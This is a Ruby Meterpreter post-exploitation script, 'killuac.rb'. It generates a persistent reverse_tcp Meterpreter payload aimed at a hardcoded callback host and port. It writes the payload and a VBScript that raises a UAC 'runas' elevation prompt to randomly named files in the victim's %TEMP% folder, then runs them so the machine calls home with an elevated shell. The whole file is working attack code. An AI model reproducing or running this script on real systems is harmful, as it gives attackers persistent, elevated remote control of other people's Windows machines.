# $Id: killuac.rb spudgunman $
#
# Meterpreter script to prompt for permissions to run in elevated mode and then call home
# some code pulled from the persistence.rb script
# Script by Kelly Keeton<kellykeeton [at] hotmail>
# Version: 0.5
#
# Default parameters
#
rhost = "192.168.254.129"
rport = 31337
payload = "windows/meterpreter/reverse_tcp"
##

tempdir = client.fs.file.expand_path("%TEMP%")
payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"

platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform

print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
pay = client.framework.payloads.create("#{payload}")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw  = pay.generate

payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
print_status("Payload script is #{payloadvbs.length} bytes long")

uacvbs = "
If WScript.Arguments.length =0 Then
  Set objShell = CreateObject(\"Shell.Application\")
  objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
Else
  Set objShell = WScript.CreateObject(\"WScript.Shell\")
  Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
  strPath = Wscript.ScriptFullName
  Set objFile = objFSO.GetFile(strPath)
  strFolder = objFSO.GetParentFolderName(objFile)
  tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
  objShell.Run(tmp)
End If"
#
# Upload to the filesystem
#
elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
print_status("UAC elevation script written to #{elevationfile}")
fd = client.fs.file.new(elevationfile, "wb")
fd.write(uacvbs)
fd.close

print_status("payload script written to #{payloadfile}")
fd = client.fs.file.new(payloadfile, "wb")
fd.write(payloadvbs)
fd.close
#
# Execute the script
#
proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
print_status("Script executed with PID #{proc.pid}")
#EOF